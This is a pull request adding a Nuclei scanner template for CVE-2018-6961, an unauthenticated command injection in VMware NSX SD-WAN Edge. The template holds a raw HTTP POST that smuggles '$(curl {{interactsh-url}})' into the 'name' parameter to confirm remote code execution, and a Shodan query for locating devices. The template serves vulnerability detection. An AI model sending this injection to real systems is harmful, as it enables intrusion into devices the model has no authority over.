### PR TITLE
feat: CVE-2018-6961 - VMware NSX SD-WAN Edge Command Injection

### DIFF
--- a/http/cves/2018/CVE-2018-6961.yaml
+++ b/http/cves/2018/CVE-2018-6961.yaml
@@ -1,0 +1,51 @@
+id: CVE-2018-6961
+
+info:
+  name: VMware NSX SD-WAN Edge - Command Injection
+  author: antigravity
+  severity: high
+  description: |
+    VMware NSX SD-WAN Edge prior to 3.1.0 contains a command injection vulnerability in the local web UI component. The `ajaxPortal.lua` script fails to properly sanitize user input in the `name` parameter when the `test` parameter is set to `DNS_TEST`, allowing unauthenticated attackers to execute arbitrary commands remotely.
+  impact: |
+    Successful exploitation of this vulnerability can lead to remote code execution on the affected device, potentially allowing an attacker to take full control of the system.
+  remediation: |
+    Update to VMware NSX SD-WAN Edge version 3.1.0 or later. Disable the local web UI on untrusted networks.
+  reference:
+    - https://www.vmware.com/security/advisories/VMSA-2018-0011.html
+    - https://www.exploit-db.com/exploits/44959/
+    - https://github.com/r3dxpl0it/CVE-2018-6961
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2018-6961
+    cwe-id: CWE-78
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: title:"VMware NSX SD-WAN"
+  tags: cve,cve2018,vmware,rce,oob,nsx,sd-wan
+
+http:
+  - raw:
+      - |
+        POST /scripts/ajaxPortal.lua HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+
+        test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic&name=google.com%24(curl%20{{interactsh-url}})
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the OOB interaction
+        words:
+          - "http"
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - "application/json"
+          - "status" # The server usually responds with JSON containing a status
+        condition: and


### PR DESCRIPTION
Contributes a Nuclei template for CVE-2018-6961.\n\nValidation: Uses OOB interaction via interactsh. Validated against exploit logic.\n\n/claim #14623